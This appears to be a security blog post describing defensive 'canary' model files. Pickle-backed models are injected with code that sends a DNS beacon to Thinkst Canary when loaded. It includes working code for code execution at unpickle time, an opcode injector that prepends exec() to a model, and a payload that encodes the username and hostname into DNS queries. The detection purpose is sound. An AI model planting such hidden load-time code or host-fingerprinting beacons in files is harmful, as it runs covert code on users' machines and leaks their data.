Defending AI Model Files from Unauthorized Access with Canaries
As AI models grow in capability and cost of creation, and hold more sensitive or proprietary data, securing them at rest is increasingly important. Organizations are designing policies and tools, often as part of data loss prevention and secure supply chain programs, to protect model weights. While security engineering discussions focus on prevention (How do we prevent X?), detection (Did X happen?) is a similarly critical part of a mature defense-in-depth framework that significantly decreases the time required to detect, isolate, and remediate an intrusion. Currently, these detection capabilities for AI models are identical to those used for monitoring any other sensitive data—no detection capability focuses on the unique nature of AI/ML.
In this post, we'll introduce canaries and then show how the common Python Pickle serialization format for AI and ML models can be augmented with canary tokens to provide additional, AI-specific loss detection capabilities extending beyond normal network monitoring solutions. While more secure model formats like safetensors are preferred, there are many reasons that organizations may still support Pickle-backed model files, and building defenses into them is part of a good risk mitigation strategy.
Canaries: Lightweight Tripwires
At the most basic level, canaries are artifacts left in the environment that no benign user would access. For example, an authorized user typically memorizes their password; they don't search a credential file for a password and then use it to authenticate to a service on the network. Security engineers can create a fake credential, leave it someplace discoverable, and generate an alert to investigate its access and usage if the credential is ever used. This is the logic behind CanaryTokens. Canaries can be relatively fast and simple to generate, require almost no maintenance, lie dormant in your infrastructure for months, and, when placed properly, produce few false positives.
Thinkst Canary is a security service that helps with the creation and monitoring of canaries. They support a wide range of formats and structures. In this case, we're focusing on DNS Canarytokens. Thinkst dynamically generates unique hostnames for each canary token you want to create. If that hostname is queried in DNS, you get an alert. The feature is incredibly scalable and offers the capability to create custom domains as well. While this blog post presents automated Canary creation, it's also possible to manually use a free version of Canarytokens or build and maintain your own canary tracking and alerting system.
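To make the mechanism concrete, here is a minimal sketch of what trips a DNS Canarytoken once a token hostname exists. The hostname below is a made-up placeholder, and the plain socket lookup simply stands in for whatever code ends up resolving the name.

import socket

# Hypothetical token hostname handed back when the DNS Canarytoken was created
CANARY_HOSTNAME = "a1b2c3d4e5f6.canarytokens.example.com"

try:
    # Any DNS resolution of this name, by any process on any host, reaches the
    # canary DNS server and raises an alert for the token's owner.
    socket.gethostbyname(CANARY_HOSTNAME)
except OSError:
    # The name may not resolve to a usable address; the query itself is the signal.
    pass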
Machine Learning Model Formats
Much of the recent focus on machine learning security has been on the deserialization vulnerability in Python Pickle and Pickle-backed file formats. While this obviously includes files ending in .pkl, it may also include files generated by PyTorch or other ML-adjacent libraries such as NumPy. If a user loads an untrusted Pickle, they're exposing themselves to arbitrary code execution. Most analysis of this arbitrary code execution has focused on the potential for malware to impact the host or the machine learning system.
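The sketch below is a minimal illustration of that exposure (not taken from any real model file): an object's __reduce__ method tells the unpickler to call an arbitrary callable during deserialization, so simply loading the bytes runs code.

import os
import pickle

class Payload:
    # __reduce__ lets any pickled object specify a callable and arguments that
    # the unpickler will invoke to "reconstruct" it.
    def __reduce__(self):
        # Harmless stand-in for attacker-controlled code
        return (os.system, ("echo code execution during unpickling",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # prints the message: the code ran at load time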
We asked ourselves: "If we must use models with this (vulner)ability, can we use it for good?"
Machine Learning Model Canaries
It is relatively easy to inject code into a serialized model artifact so that it beacons as a canary when loaded. In our initial research, we used Thinkst DNS Canarytokens: the modified model preserves all of its original functionality but also silently beacons to Thinkst. We can use this to either track usage or identify if someone is using a model that should never be used (a true canary). If necessary, this alert can trigger an incident response playbook or hunt operation. Figure 1 shows the workflow from canary generation to an unauthorized user generating an alert.
Figure 1. The canary model generation and alerting process: a user generates a unique token identifier, injects the token-calling code into a model file, and places the canary in an object store; when an unauthorized user downloads and loads the model, an alert is generated.
As shown in the following code block, the approach is easy to implement with Thinkst Canary, or it can be used with proprietary server-side tracking functionality.
import os
import requests
from pathlib import Path

API_KEY = os.environ["CANARY_API_KEY"]

def inject_pickle(original: Path, out: Path, target: str):
    """Mock for a function that takes a pickle-backed model file, injects code to ping <target>, and writes it to an output file"""
    return

def get_hostname(memo: str) -> str:
    """Register with the Thinkst server and get a DNS canary hostname"""
    url = 'https://EXAMPLE.canary.tools/api/v1/canarytoken/create'
    payload = {
        'auth_token': API_KEY,
        'memo': memo,
        'kind': 'dns',
    }
    r = requests.post(url, data=payload)
    return r.json()["canarytoken"]["hostname"]

def upload(file: Path, destination: str):
    """Mock for uploading a file to a destination"""
    return

def create_canary(model_file: Path, canary_file: Path, destination: str):
    """Register a new canary with Thinkst and generate a new 'canarified' model"""
    host = get_hostname(memo=f"Model Canary at {destination}/{canary_file.name}")
    inject_pickle(model_file, canary_file, host)
    upload(canary_file, destination)

create_canary(Path("model.pkl"), Path("super_secret_model.pkl"), "s3://model-bucket/")
Under the hood, the injection prepends the serialized model with a call to exec. When the file is unpickled, that call functions as a beacon to our Canary DNS endpoint.
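As a hedged illustration of that prepend, the sketch below shows one way the hypothetical inject_pickle helper from the earlier block could be implemented: a few protocol-0 pickle opcodes push builtins.exec and a one-line DNS beacon, call it, and discard the result before the untouched original stream loads the real model. This is an assumption about the implementation, not the exact code.

from pathlib import Path

def inject_pickle(original: Path, out: Path, target: str) -> None:
    """Sketch: prepend an exec-based DNS beacon to an existing pickle stream."""
    beacon = f"import socket; socket.gethostbyname('{target}')"
    payload = (
        b"cbuiltins\nexec\n"              # GLOBAL: push builtins.exec onto the stack
        b"(V" + beacon.encode() + b"\n"   # MARK + UNICODE: push the beacon source string
        b"tR"                             # TUPLE + REDUCE: call exec(beacon)
        b"0"                              # POP: discard the result (None)
    )
    # The original opcodes follow unchanged, so pickle.load still returns the model.
    out.write_bytes(payload + original.read_bytes())

When pickle.load processes the combined stream, it imports builtins.exec, runs the beacon (triggering the DNS alert), pops the result, and then deserializes the original model exactly as before.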
Here's how it might work in practice. A security engineer creates a canary model file and places it in a private repository. Months later, a Thinkst Canary alert is triggered and an incident response process, tailored towards securing private repositories and sensitive models, is initiated. Leveraging this signal at its earliest stage, defenders can identify, isolate, and remediate the misconfiguration that enabled the unauthorized access.
The basic beacon-on-load functionality can be just the beginning, which is the beauty of arbitrary code execution. This technique could be extended to more granular host fingerprinting or other cyber deception operations.
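For example, a hypothetical fingerprinting payload, assuming the alerting backend records the full queried name, could fold a few host details into an extra DNS label in front of the canary hostname; the helper name and encoding choice here are illustrative.

import base64
import getpass
import socket

def fingerprint_beacon(canary_hostname: str) -> None:
    """Encode the local username and hostname into a DNS-safe label, then resolve it."""
    details = f"{getpass.getuser()}:{socket.gethostname()}".encode()
    # Base32 keeps the label DNS-safe once padding is stripped and it is lowercased
    label = base64.b32encode(details).decode().rstrip("=").lower()
    try:
        socket.gethostbyname(f"{label[:63]}.{canary_hostname}")  # DNS labels max out at 63 chars
    except OSError:
        pass  # the query itself carries the fingerprint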
Secure AI Strategy
A secure AI strategy can start with secure file formats and strong preventative controls. To mitigate the residual risk, consider adding canary functionality to your detection strategy so you are alerted if an unauthorized user accesses proprietary models. Compared with other defensive controls, canary models are easy to implement, require minimal maintenance or overhead, and can generate actionable alerts. These techniques move us toward a world where unauthorized users should think twice before searching for, exfiltrating, and executing models.
For more information about AI Security, check out other NVIDIA Technical Blog posts.
Conclusion
In this post, we introduced canary tokens and showed how Pickle-backed model files can be augmented with them to provide AI-specific loss detection beyond normal network monitoring. We walked through creating a canary model, placing it in a private repository, and using Thinkst Canary to raise an alert when an unauthorized user loads it. The same approach can support detection of and response to unauthorized access to sensitive models, and it can be extended to more granular host fingerprinting or other cyber deception operations.